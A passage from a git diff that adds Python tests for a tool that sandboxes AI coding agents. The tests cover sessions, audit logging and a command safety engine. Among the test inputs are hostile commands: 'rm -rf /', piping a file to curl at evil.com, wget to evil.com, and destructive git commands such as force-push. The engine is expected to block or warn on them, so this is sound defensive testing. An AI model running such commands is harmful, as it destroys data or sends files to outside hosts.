sessions_file.write_text(json.dumps({"sessions": [{"id": "s1"}]})) + + with patch( + "scc_cli.sessions.get_provider_sessions_dir", + return_value=sessions_dir, + ): + result = get_provider_recent_sessions("claude") + assert result == [{"id": "s1"}] + + def test_provider_recent_sessions_handles_corrupt_json(self, tmp_path: Path) -> None: + """get_provider_recent_sessions returns [] on malformed JSON.""" + sessions_dir = tmp_path / ".agent" + sessions_dir.mkdir() + (sessions_dir / "sessions.json").write_text("{bad json") + + with patch( + "scc_cli.sessions.get_provider_sessions_dir", + return_value=sessions_dir, + ): + result = get_provider_recent_sessions("claude") + assert result == [] + + +# ═══════════════════════════════════════════════════════════════════════════════ +# get_provider_config_dir (audit.py) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderConfigDir: + """Tests for audit.get_provider_config_dir.""" + + def test_claude_returns_dot_claude(self) -> None: + result = get_provider_config_dir("claude") + assert result == Path.home() / ".claude" + + def test_codex_returns_dot_codex(self) -> None: + result = get_provider_config_dir("codex") + assert result == Path.home() / ".codex" + + def test_default_is_claude(self) -> None: + result = get_provider_config_dir() + assert result == Path.home() / ".claude" + + def test_unknown_provider_raises(self) -> None: + with pytest.raises(InvalidProviderError): + get_provider_config_dir("unknown") + + +# ═══════════════════════════════════════════════════════════════════════════════ +# WorkContext.provider_id +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestWorkContextProviderId: + """Tests for WorkContext provider_id field and display_label.""" + + def _make_ctx(self, **overrides: object) -> WorkContext: + defaults = { + "team": "platform", + "repo_root": Path("/code/repo"), + "worktree_path": Path("/code/repo"), + "worktree_name": "main", + "branch": "main", + } + defaults.update(overrides) + return WorkContext(**defaults) # type: ignore[arg-type] + + def test_provider_id_roundtrip(self) -> None: + ctx = self._make_ctx(provider_id="codex") + data = ctx.to_dict() + restored = WorkContext.from_dict(data) + assert restored.provider_id == "codex" + + def test_provider_id_default_none(self) -> None: + ctx = self._make_ctx() + assert ctx.provider_id is None + + def test_from_dict_backward_compat_no_provider_key(self) -> None: + """Old serialized dicts without provider_id should deserialize to None.""" + data = { + "team": "platform", + "repo_root": "/code/repo", + "worktree_path": "/code/repo", + "worktree_name": "main", + } + ctx = WorkContext.from_dict(data) + assert ctx.provider_id is None + + def test_display_label_without_provider(self) -> None: + ctx = self._make_ctx(provider_id=None) + label = ctx.display_label + assert "platform" in label + assert "repo" in label + # No provider suffix + assert "(" not in label + + def test_display_label_with_claude_provider(self) -> None: + """Claude is the default provider — not shown in display_label.""" + ctx = self._make_ctx(provider_id="claude") + label = ctx.display_label + assert "(claude)" not in label + + def test_display_label_with_codex_provider(self) -> None: + """Non-default providers are surfaced in display_label.""" + ctx = self._make_ctx(provider_id="codex") + label = ctx.display_label + assert "(codex)" in label + + def test_to_dict_includes_provider_id(self) -> None: + ctx = self._make_ctx(provider_id="codex") + data = ctx.to_dict() + assert data["provider_id"] == "codex" + + def test_to_dict_includes_none_provider_id(self) -> None: + ctx = self._make_ctx() + data = ctx.to_dict() + assert data["provider_id"] is None + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Session list provider column +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestSessionListProvider: + """Tests for session list CLI provider_id inclusion.""" + + def test_session_dicts_includes_provider_id(self) -> None: + """session_dicts built from SessionSummary carry provider_id.""" + from scc_cli.ports.session_models import SessionSummary + + summary = SessionSummary( + name="test-session", + workspace="/code/repo", + team="platform", + last_used="2026-01-01T00:00:00Z", + container_name="scc-test-abc", + branch="main", + provider_id="codex", + ) + # Replicate the dict-building logic from session_commands.py + session_dict = { + "name": summary.name, + "workspace": summary.workspace, + "team": summary.team, + "last_used": summary.last_used, + "container_name": summary.container_name, + "branch": summary.branch, + "provider_id": summary.provider_id or "claude", + } + assert session_dict["provider_id"] == "codex" + + def test_session_dicts_defaults_none_to_claude(self) -> None: + """When SessionSummary.provider_id is None, dict defaults to 'claude'.""" + from scc_cli.ports.session_models import SessionSummary + + summary = SessionSummary( + name="test-session", + workspace="/code/repo", + team="platform", + last_used="2026-01-01T00:00:00Z", + container_name=None, + branch=None, + provider_id=None, + ) + session_dict = { + "provider_id": summary.provider_id or "claude", + } + assert session_dict["provider_id"] == "claude" diff --git a/tests/test_safety_adapter_audit.py b/tests/test_safety_adapter_audit.py new file mode 100644 index 0000000..f5e881f --- /dev/null +++ b/tests/test_safety_adapter_audit.py @@ -0,0 +1,130 @@ +"""Cross-adapter audit integration tests — engine → adapter → audit event chain.""" + +from __future__ import annotations + +from scc_cli.adapters.claude_safety_adapter import ClaudeSafetyAdapter +from scc_cli.adapters.codex_safety_adapter import CodexSafetyAdapter +from scc_cli.bootstrap import DefaultAdapters +from scc_cli.core.contracts import SafetyPolicy +from scc_cli.core.enums import SeverityLevel +from scc_cli.core.safety_engine import DefaultSafetyEngine +from tests.fakes import FakeAuditEventSink + +_POLICY = SafetyPolicy() + + +def _make_claude() -> tuple[ClaudeSafetyAdapter, FakeAuditEventSink]: + engine = DefaultSafetyEngine() + sink = FakeAuditEventSink() + return ClaudeSafetyAdapter(engine=engine, audit_sink=sink), sink + + +def _make_codex() -> tuple[CodexSafetyAdapter, FakeAuditEventSink]: + engine = DefaultSafetyEngine() + sink = FakeAuditEventSink() + return CodexSafetyAdapter(engine=engine, audit_sink=sink), sink + + +class TestClaudeAdapterFullChainBlocked: + def test_blocked_verdict_and_audit_event(self) -> None: + adapter, sink = _make_claude() + result = adapter.check_command("git push --force", _POLICY) + + assert result.verdict.allowed is False + assert result.audit_emitted is True + assert "[Claude] Command blocked" in result.user_message + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.metadata["provider_id"] == "claude" + assert event.severity == SeverityLevel.WARNING + + +class TestCodexAdapterFullChainBlocked: + def test_blocked_verdict_and_audit_event(self) -> None: + adapter, sink = _make_codex() + result = adapter.check_command("git push --force", _POLICY) + + assert result.verdict.allowed is False + assert result.audit_emitted is True + assert "[Codex] Command blocked" in result.user_message + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.metadata["provider_id"] == "codex" + assert event.severity == SeverityLevel.WARNING + + +class TestClaudeAdapterFullChainAllowed: + def test_allowed_verdict_and_audit_event(self) -> None: + adapter, sink = _make_claude() + result = adapter.check_command("git status", _POLICY) + + assert result.verdict.allowed is True + assert result.user_message == "[Claude] Command allowed" + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.INFO + + +class TestCodexAdapterFullChainAllowed: + def test_allowed_verdict_and_audit_event(self) -> None: + adapter, sink = _make_codex() + result = adapter.check_command("git status", _POLICY) + + assert result.verdict.allowed is True + assert result.user_message == "[Codex] Command allowed" + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.INFO + + +class TestBothAdaptersShareEngineVerdicts: + def test_same_command_produces_same_verdict(self) -> None: + engine = DefaultSafetyEngine() + claude_sink = FakeAuditEventSink() + codex_sink = FakeAuditEventSink() + claude = ClaudeSafetyAdapter(engine=engine, audit_sink=claude_sink) + codex = CodexSafetyAdapter(engine=engine, audit_sink=codex_sink) + + policy = SafetyPolicy() + command = "git push --force" + + claude_result = claude.check_command(command, policy) + codex_result = codex.check_command(command, policy) + + assert claude_result.verdict.allowed == codex_result.verdict.allowed + assert claude_result.verdict.matched_rule == codex_result.verdict.matched_rule + + +class TestAuditMetadataKeysAreAllStrings: + def test_all_metadata_values_are_strings(self) -> None: + adapter, sink = _make_claude() + adapter.check_command("git push --force", _POLICY) + + event = sink.events[0] + for key, value in event.metadata.items(): + assert isinstance(value, str), ( + f"metadata[{key!r}] is {type(value).__name__}, expected str" + ) + + +class TestBootstrapWiringHasSafetyAdapterFields: + def test_default_adapters_accepts_safety_adapter_fields(self) -> None: + """Verify DefaultAdapters has the new fields (no Docker probe call).""" + import dataclasses + + field_names = {f.name for f in dataclasses.fields(DefaultAdapters)} + assert "claude_safety_adapter" in field_names + assert "codex_safety_adapter" in field_names + + def test_fields_default_to_none(self) -> None: + """Verify new fields are optional with None default.""" + import dataclasses + + fields_by_name = {f.name: f for f in dataclasses.fields(DefaultAdapters)} + for name in ("claude_safety_adapter", "codex_safety_adapter"): + f = fields_by_name[name] + assert f.default is None, f"{name} default is {f.default!r}, expected None" diff --git a/tests/test_safety_audit.py b/tests/test_safety_audit.py new file mode 100644 index 0000000..21064ce --- /dev/null +++ b/tests/test_safety_audit.py @@ -0,0 +1,336 @@ +"""Tests for safety audit reader, CLI command, and support-bundle integration.""" + +from __future__ import annotations + +import json +from datetime import datetime, timezone +from pathlib import Path +from unittest.mock import patch + +from typer.testing import CliRunner + +from scc_cli.adapters.local_audit_event_sink import serialize_audit_event +from scc_cli.application.safety_audit import read_safety_audit_diagnostics +from scc_cli.cli import app +from scc_cli.core.contracts import AuditEvent +from scc_cli.core.enums import SeverityLevel + +runner = CliRunner() + + +def _write_audit_lines(path: Path, lines: list[str | bytes]) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + with path.open("wb") as handle: + for line in lines: + payload = line if isinstance(line, bytes) else line.encode("utf-8") + handle.write(payload) + handle.write(b"\n") + + +def _safety_event( + *, + command: str = "rm -rf /", + verdict_allowed: str = "true", + matched_rule: str | None = None, + provider_id: str = "claude", + severity: SeverityLevel = SeverityLevel.INFO, + message: str = "safety check", +) -> str: + meta: dict[str, str] = { + "command": command, + "verdict_allowed": verdict_allowed, + "provider_id": provider_id, + } + if matched_rule is not None: + meta["matched_rule"] = matched_rule + return serialize_audit_event( + AuditEvent( + event_type="safety.check", + message=message, + severity=severity, + subject=provider_id, + metadata=meta, + ) + ) + + +def _launch_event(*, provider_id: str = "claude", message: str = "preflight passed") -> str: + return serialize_audit_event( + AuditEvent( + event_type="launch.preflight.passed", + message=message, + severity=SeverityLevel.INFO, + subject=provider_id, + metadata={"provider_id": provider_id}, + ) + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Reader unit tests +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSafetyAuditReader: + def test_empty_sink_returns_empty_state(self, tmp_path: Path) -> None: + """No file exists → state 'unavailable'.""" + diag = read_safety_audit_diagnostics(audit_path=tmp_path / "missing.jsonl", limit=5) + assert diag.state == "unavailable" + assert diag.recent_events == () + assert diag.last_blocked is None + assert diag.blocked_count == 0 + assert diag.allowed_count == 0 + + def test_filters_to_safety_check_events(self, tmp_path: Path) -> None: + """Mixed JSONL with launch and safety.check events → only safety.check returned.""" + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _launch_event(provider_id="claude"), + _safety_event(command="ls", verdict_allowed="true"), + _launch_event(provider_id="codex"), + _safety_event(command="rm -rf /", verdict_allowed="false"), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10) + + assert diag.state == "available" + assert len(diag.recent_events) == 2 + for event in diag.recent_events: + assert event.event_type == "safety.check" + + def test_blocked_allowed_counts(self, tmp_path: Path) -> None: + """Verify blocked_count and allowed_count.""" + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _safety_event(command="ls", verdict_allowed="true"), + _safety_event(command="cat file", verdict_allowed="true"), + _safety_event(command="rm -rf /", verdict_allowed="false"), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10) + + assert diag.allowed_count == 2 + assert diag.blocked_count == 1 + + def test_last_blocked_populated(self, tmp_path: Path) -> None: + """Verify last_blocked is the most recent blocked event.""" + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _safety_event(command="rm file1", verdict_allowed="false", message="block 1"), + _safety_event(command="rm file2", verdict_allowed="false", message="block 2"), + _safety_event(command="ls", verdict_allowed="true"), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10) + + assert diag.last_blocked is not None + assert diag.last_blocked.message == "block 2" + assert diag.last_blocked.command == "rm file2" + + def test_bounded_scan(self, tmp_path: Path) -> None: + """Verify limit parameter works — only last N safety events returned.""" + audit_path = tmp_path / "events.jsonl" + events = [ + _safety_event(command=f"cmd-{i}", verdict_allowed="true", message=f"event {i}") + for i in range(10) + ] + _write_audit_lines(audit_path, events) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=3) + + assert len(diag.recent_events) == 3 + # Most recent first (reversed) + assert diag.recent_events[0].message == "event 9" + assert diag.recent_events[1].message == "event 8" + assert diag.recent_events[2].message == "event 7" + + def test_malformed_lines_skipped(self, tmp_path: Path) -> None: + """Malformed JSON lines don't crash, increment malformed count.""" + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _safety_event(command="ls", verdict_allowed="true"), + b"this is not json{{{", + _safety_event(command="cat", verdict_allowed="true"), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10) + + assert diag.malformed_line_count == 1 + assert len(diag.recent_events) == 2 + + def test_redact_paths(self, tmp_path: Path) -> None: + """Home directory replaced with ~.""" + home = str(Path.home()) + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _safety_event( + command=f"{home}/scripts/danger.sh", + verdict_allowed="false", + ), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10, redact_paths=True) + + assert diag.recent_events[0].command is not None + assert home not in diag.recent_events[0].command + assert "~" in diag.recent_events[0].command + + def test_redact_paths_disabled(self, tmp_path: Path) -> None: + """When redact_paths=False, home dir stays in output.""" + home = str(Path.home()) + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [ + _safety_event( + command=f"{home}/scripts/danger.sh", + verdict_allowed="false", + ), + ], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=10, redact_paths=False) + + assert diag.recent_events[0].command is not None + assert home in diag.recent_events[0].command + + def test_to_dict_returns_serializable(self, tmp_path: Path) -> None: + """to_dict() returns JSON-serializable dict.""" + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [_safety_event(command="ls", verdict_allowed="true")], + ) + + diag = read_safety_audit_diagnostics(audit_path=audit_path, limit=5) + d = diag.to_dict() + + assert isinstance(d, dict) + json.dumps(d) # must not raise + + +# ───────────────────────────────────────────────────────────────────────────── +# CLI command tests +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSafetyAuditCLI: + def test_safety_audit_json_mode(self, tmp_path: Path) -> None: + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [_safety_event(command="rm /", verdict_allowed="false")], + ) + + with patch("scc_cli.commands.support.config.LAUNCH_AUDIT_FILE", audit_path): + result = runner.invoke(app, ["support", "safety-audit", "--json"]) + + assert result.exit_code == 0 + envelope = json.loads(result.output) + assert envelope["kind"] == "SafetyAudit" + assert envelope["data"]["state"] == "available" + + def test_safety_audit_human_mode(self, tmp_path: Path) -> None: + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [_safety_event(command="rm /", verdict_allowed="false")], + ) + + with patch("scc_cli.commands.support.config.LAUNCH_AUDIT_FILE", audit_path): + result = runner.invoke(app, ["support", "safety-audit"]) + + assert result.exit_code == 0 + assert "Safety audit" in result.output + assert "Blocked:" in result.output + + def test_safety_audit_unavailable_sink(self, tmp_path: Path) -> None: + with patch( + "scc_cli.commands.support.config.LAUNCH_AUDIT_FILE", + tmp_path / "missing.jsonl", + ): + result = runner.invoke(app, ["support", "safety-audit"]) + + assert result.exit_code == 0 + assert "unavailable" in result.output + + +# ───────────────────────────────────────────────────────────────────────────── +# Support bundle integration test +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSupportBundleSafetySection: + def test_support_bundle_has_safety_section(self, tmp_path: Path) -> None: + """Mock dependencies, verify manifest['safety'] key exists.""" + from scc_cli.application.support_bundle import ( + SupportBundleDependencies, + SupportBundleRequest, + build_support_bundle_manifest, + ) + from scc_cli.doctor import CheckResult, DoctorResult + + class _FakeFilesystem: + def exists(self, path: Path) -> bool: + return False + + def read_text(self, path: Path) -> str: + return "{}" + + class _FixedClock: + def now(self) -> datetime: + return datetime(2024, 1, 1, 0, 0, 0, tzinfo=timezone.utc) + + class _PassingDoctor: + def run(self, workspace: str | None = None) -> DoctorResult: + return DoctorResult(checks=[CheckResult(name="Docker", passed=True, message="OK")]) + + class _FakeArchive: + def write_manifest(self, path: str, content: str) -> None: + pass + + audit_path = tmp_path / "events.jsonl" + _write_audit_lines( + audit_path, + [_safety_event(command="ls", verdict_allowed="true")], + ) + + deps = SupportBundleDependencies( + filesystem=_FakeFilesystem(), # type: ignore[arg-type] + clock=_FixedClock(), # type: ignore[arg-type] + doctor_runner=_PassingDoctor(), # type: ignore[arg-type] + archive_writer=_FakeArchive(), # type: ignore[arg-type] + launch_audit_path=audit_path, + ) + + request = SupportBundleRequest( + output_path=tmp_path / "bundle.zip", + redact_paths=True, + ) + + with patch( + "scc_cli.application.support_bundle._load_raw_org_config_for_bundle", + return_value=None, + ): + manifest = build_support_bundle_manifest(request, dependencies=deps) + + assert "safety" in manifest + safety = manifest["safety"] + assert "effective_policy" in safety + assert "recent_audit" in safety + assert safety["effective_policy"]["action"] == "block" diff --git a/tests/test_safety_doctor_check.py b/tests/test_safety_doctor_check.py new file mode 100644 index 0000000..b580c75 --- /dev/null +++ b/tests/test_safety_doctor_check.py @@ -0,0 +1,74 @@ +"""Tests for doctor.checks.safety — safety-policy doctor check.""" + +from __future__ import annotations + +from typing import Any +from unittest.mock import patch + +from scc_cli.core.enums import SeverityLevel +from scc_cli.doctor.checks.safety import check_safety_policy + +_PATCH_TARGET = "scc_cli.doctor.checks.safety._load_raw_org_config" + + +def _org(safety_net: dict[str, Any]) -> dict[str, Any]: + """Build a minimal org config dict.""" + return {"security": {"safety_net": safety_net}} + + +class TestCheckSafetyPolicy: + """Covers the four documented scenarios: valid config, no config, no section, malformed.""" + + @patch(_PATCH_TARGET) + def test_check_passes_with_valid_org_config(self, mock_load: Any) -> None: + mock_load.return_value = _org({"action": "warn"}) + result = check_safety_policy() + assert result.passed is True + assert "warn" in result.message + + @patch(_PATCH_TARGET) + def test_check_warns_when_no_org_config(self, mock_load: Any) -> None: + mock_load.return_value = None + result = check_safety_policy() + assert result.passed is True + assert result.severity == SeverityLevel.WARNING + assert "No org config" in result.message + + @patch(_PATCH_TARGET) + def test_check_warns_when_no_safety_net_section(self, mock_load: Any) -> None: + mock_load.return_value = {"security": {"other": True}} + result = check_safety_policy() + assert result.passed is True + assert result.severity == SeverityLevel.WARNING + assert "No safety_net section" in result.message + + @patch(_PATCH_TARGET) + def test_check_errors_on_invalid_action(self, mock_load: Any) -> None: + mock_load.return_value = _org({"action": "yolo"}) + result = check_safety_policy() + assert result.passed is False + assert result.severity == SeverityLevel.ERROR + assert "yolo" in result.message + assert result.fix_hint is not None + + @patch(_PATCH_TARGET) + def test_check_errors_on_malformed_org_config(self, mock_load: Any) -> None: + mock_load.side_effect = RuntimeError("corrupt cache") + result = check_safety_policy() + assert result.passed is False + assert result.severity == SeverityLevel.ERROR + assert "Unexpected error" in result.message + + @patch(_PATCH_TARGET) + def test_check_passes_with_block_action(self, mock_load: Any) -> None: + mock_load.return_value = _org({"action": "block"}) + result = check_safety_policy() + assert result.passed is True + assert "block" in result.message + + @patch(_PATCH_TARGET) + def test_check_passes_with_allow_action(self, mock_load: Any) -> None: + mock_load.return_value = _org({"action": "allow"}) + result = check_safety_policy() + assert result.passed is True + assert "allow" in result.message diff --git a/tests/test_safety_engine.py b/tests/test_safety_engine.py new file mode 100644 index 0000000..9761fd4 --- /dev/null +++ b/tests/test_safety_engine.py @@ -0,0 +1,183 @@ +"""Integration tests for DefaultSafetyEngine.""" + +from __future__ import annotations + +from scc_cli.core.contracts import SafetyPolicy +from scc_cli.core.enums import CommandFamily +from scc_cli.core.safety_engine import DefaultSafetyEngine +from scc_cli.ports.safety_engine import SafetyEngine + +# ── Helpers ────────────────────────────────────────────────────────────────── + + +def _engine() -> DefaultSafetyEngine: + return DefaultSafetyEngine() + + +def _block_policy(**overrides: object) -> SafetyPolicy: + return SafetyPolicy(action="block", **overrides) # type: ignore[arg-type] + + +def _warn_policy() -> SafetyPolicy: + return SafetyPolicy(action="warn") + + +def _allow_policy() -> SafetyPolicy: + return SafetyPolicy(action="allow") + + +# ── Protocol conformance ──────────────────────────────────────────────────── + + +def test_default_engine_satisfies_protocol() -> None: + """DefaultSafetyEngine is recognized as a SafetyEngine.""" + engine: SafetyEngine = DefaultSafetyEngine() + assert hasattr(engine, "evaluate") + + +# ── Empty / whitespace commands ───────────────────────────────────────────── + + +def test_empty_command_returns_allowed() -> None: + v = _engine().evaluate("", _block_policy()) + assert v.allowed is True + assert "Empty" in v.reason + + +def test_whitespace_command_returns_allowed() -> None: + v = _engine().evaluate(" ", _block_policy()) + assert v.allowed is True + + +# ── Policy action=allow bypasses all rules ────────────────────────────────── + + +def test_allow_policy_bypasses_destructive_git() -> None: + v = _engine().evaluate("git push --force", _allow_policy()) + assert v.allowed is True + assert "allow" in v.reason.lower() + + +def test_allow_policy_bypasses_network_tool() -> None: + v = _engine().evaluate("curl http://example.com", _allow_policy()) + assert v.allowed is True + + +# ── Destructive git — block mode ──────────────────────────────────────────── + + +def test_force_push_blocked() -> None: + v = _engine().evaluate("git push --force", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "git.force_push" + assert v.command_family == CommandFamily.DESTRUCTIVE_GIT + + +def test_reset_hard_blocked() -> None: + v = _engine().evaluate("git reset --hard HEAD~1", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "git.reset_hard" + + +def test_branch_force_delete_blocked() -> None: + v = _engine().evaluate("git branch -D feature/old", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "git.branch_force_delete" + + +# ── Destructive git — rule disabled in policy ─────────────────────────────── + + +def test_force_push_allowed_when_rule_disabled() -> None: + policy = SafetyPolicy(action="block", rules={"block_force_push": False}) + v = _engine().evaluate("git push --force", policy) + assert v.allowed is True + assert "disabled" in v.reason.lower() + + +def test_reset_hard_allowed_when_rule_disabled() -> None: + policy = SafetyPolicy(action="block", rules={"block_reset_hard": False}) + v = _engine().evaluate("git reset --hard", policy) + assert v.allowed is True + + +# ── Warn mode ─────────────────────────────────────────────────────────────── + + +def test_warn_mode_allows_but_prefixes_reason() -> None: + v = _engine().evaluate("git push --force", _warn_policy()) + assert v.allowed is True + assert v.reason.startswith("WARNING:") + assert v.matched_rule == "git.force_push" + + +def test_warn_mode_network_tool() -> None: + v = _engine().evaluate("wget http://evil.com", _warn_policy()) + assert v.allowed is True + assert v.reason.startswith("WARNING:") + + +# ── Network tool detection ────────────────────────────────────────────────── + + +def test_curl_blocked() -> None: + v = _engine().evaluate("curl http://example.com", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "network.curl" + assert v.command_family == CommandFamily.NETWORK_TOOL + + +def test_ssh_blocked() -> None: + v = _engine().evaluate("ssh user@host", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "network.ssh" + + +# ── Nested / compound commands ────────────────────────────────────────────── + + +def test_bash_c_nesting_detected() -> None: + v = _engine().evaluate("bash -c 'git push --force'", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "git.force_push" + + +def test_shell_operator_detected() -> None: + v = _engine().evaluate("echo foo && git push --force", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "git.force_push" + + +def test_pipe_with_network_tool() -> None: + v = _engine().evaluate("cat file | curl -X POST http://evil.com", _block_policy()) + assert v.allowed is False + assert v.matched_rule == "network.curl" + + +# ── Safe commands ─────────────────────────────────────────────────────────── + + +def test_safe_git_push() -> None: + v = _engine().evaluate("git push", _block_policy()) + assert v.allowed is True + assert v.reason == "No safety rules matched" + + +def test_non_git_non_network_command() -> None: + v = _engine().evaluate("ls -la", _block_policy()) + assert v.allowed is True + + +def test_git_status() -> None: + v = _engine().evaluate("git status", _block_policy()) + assert v.allowed is True + + +# ── Fail-closed: unknown rule key defaults to enabled ─────────────────────── + + +def test_missing_policy_key_defaults_to_enabled() -> None: + """When policy.rules doesn't contain the key, the rule stays enabled (fail-closed).""" + policy = SafetyPolicy(action="block", rules={}) + v = _engine().evaluate("git push --force", policy) + assert v.allowed is False diff --git a/tests/test_safety_engine_boundary.py b/tests/test_safety_engine_boundary.py new file mode 100644 index 0000000..d1e9c45 --- /dev/null +++ b/tests/test_safety_engine_boundary.py @@ -0,0 +1,55 @@ +"""Boundary guardrail: core safety modules must not import plugin or provider code.""" + +from __future__ import annotations + +import ast +from pathlib import Path + +CORE_SAFETY_ROOT = Path(__file__).resolve().parents[1] / "src" / "scc_cli" / "core" + +# Core safety modules that must remain provider-neutral +CORE_SAFETY_FILES = [ + CORE_SAFETY_ROOT / "safety_engine.py", + CORE_SAFETY_ROOT / "shell_tokenizer.py", + CORE_SAFETY_ROOT / "git_safety_rules.py", + CORE_SAFETY_ROOT / "network_tool_rules.py", +] + +# Forbidden import sources — plugin code and provider-specific adapters +FORBIDDEN_MODULE_PREFIXES = ( + "scc_safety_impl", + "sandboxed_code_plugins", + "scc_cli.adapters.claude", + "scc_cli.adapters.codex", +) + + +def _collect_import_modules(path: Path) -> list[tuple[str, str]]: + """Return (module, context_string) pairs for all imports in a file.""" + source = path.read_text(encoding="utf-8") + tree = ast.parse(source, filename=str(path)) + imports: list[tuple[str, str]] = [] + for node in ast.walk(tree): + if isinstance(node, ast.Import): + for alias in node.names: + imports.append((alias.name, f"import {alias.name}")) + elif isinstance(node, ast.ImportFrom): + module = node.module or "" + imports.append((module, f"from {module} import ...")) + return imports + + +def test_core_safety_modules_have_no_forbidden_imports() -> None: + """Core safety modules do not import from plugin or provider adapter code.""" + violations: list[str] = [] + + for path in CORE_SAFETY_FILES: + if not path.exists(): + continue + for module, context in _collect_import_modules(path): + if any(module.startswith(prefix) for prefix in FORBIDDEN_MODULE_PREFIXES): + violations.append(f"{path.name}: {context}") + + assert not violations, "Core safety modules contain forbidden imports:\n" + "\n".join( + violations + ) diff --git a/tests/test_safety_eval_contract.py b/tests/test_safety_eval_contract.py new file mode 100644 index 0000000..2429d84 --- /dev/null +++ b/tests/test_safety_eval_contract.py @@ -0,0 +1,173 @@ +"""Contract tests: standalone safety evaluator vs DefaultSafetyEngine. + +Feeds identical command/policy pairs to both the host CLI's +DefaultSafetyEngine and the standalone scc_safety_eval engine, +asserting identical verdicts (allowed, matched_rule, command_family). +""" + +from __future__ import annotations + +import sys +from pathlib import Path + +# ── Make the standalone package importable ───────────────────────────────── +_wrappers_dir = str(Path(__file__).resolve().parent.parent / "images" / "scc-base" / "wrappers") +if _wrappers_dir not in sys.path: + sys.path.insert(0, _wrappers_dir) + +from scc_safety_eval.contracts import SafetyPolicy as StandalonePolicy # noqa: E402 +from scc_safety_eval.engine import DefaultSafetyEngine as StandaloneEngine # noqa: E402 + +from scc_cli.core.contracts import SafetyPolicy as HostPolicy # noqa: E402 +from scc_cli.core.safety_engine import DefaultSafetyEngine as HostEngine # noqa: E402 + +# ── Helpers ──────────────────────────────────────────────────────────────── + + +def _make_policies( + action: str = "block", + rules: dict | None = None, +) -> tuple: + """Build matching host and standalone policies from the same data.""" + r = rules or {} + return HostPolicy(action=action, rules=r), StandalonePolicy(action=action, rules=r) + + +def _assert_verdicts_match(command: str, host_policy, standalone_policy) -> None: + """Evaluate a command with both engines and assert field-level equality.""" + host_verdict = HostEngine().evaluate(command, host_policy) + standalone_verdict = StandaloneEngine().evaluate(command, standalone_policy) + + assert host_verdict.allowed == standalone_verdict.allowed, ( + f"allowed mismatch for {command!r}: " + f"host={host_verdict.allowed}, standalone={standalone_verdict.allowed}" + ) + assert host_verdict.matched_rule == standalone_verdict.matched_rule, ( + f"matched_rule mismatch for {command!r}: " + f"host={host_verdict.matched_rule}, standalone={standalone_verdict.matched_rule}" + ) + assert host_verdict.command_family == standalone_verdict.command_family, ( + f"command_family mismatch for {command!r}: " + f"host={host_verdict.command_family}, standalone={standalone_verdict.command_family}" + ) + + +# ── Contract tests ───────────────────────────────────────────────────────── + + +class TestSafetyEvalContract: + """Verdict equivalence between host and standalone engines.""" + + def test_force_push_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push --force origin main", hp, sp) + + def test_force_push_f_flag(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push -f", hp, sp) + + def test_force_refspec(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push origin +main", hp, sp) + + def test_push_mirror_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push --mirror", hp, sp) + + def test_network_tool_curl_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("curl https://example.com", hp, sp) + + def test_network_tool_wget_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("wget https://example.com/file.tar.gz", hp, sp) + + def test_network_tool_ssh_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("ssh user@host", hp, sp) + + def test_network_tool_rsync_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("rsync -avz src/ host:/dst/", hp, sp) + + def test_safe_command_allowed(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git status", hp, sp) + + def test_safe_git_push_allowed(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push origin main", hp, sp) + + def test_ls_allowed(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("ls -la", hp, sp) + + def test_warn_mode(self) -> None: + hp, sp = _make_policies(action="warn") + _assert_verdicts_match("git push --force origin main", hp, sp) + + def test_allow_policy_bypass(self) -> None: + hp, sp = _make_policies(action="allow") + _assert_verdicts_match("git push --force origin main", hp, sp) + + def test_disabled_rule(self) -> None: + hp, sp = _make_policies(rules={"block_force_push": False}) + _assert_verdicts_match("git push --force origin main", hp, sp) + + def test_nested_bash_c(self) -> None: + hp, sp = _make_policies() + 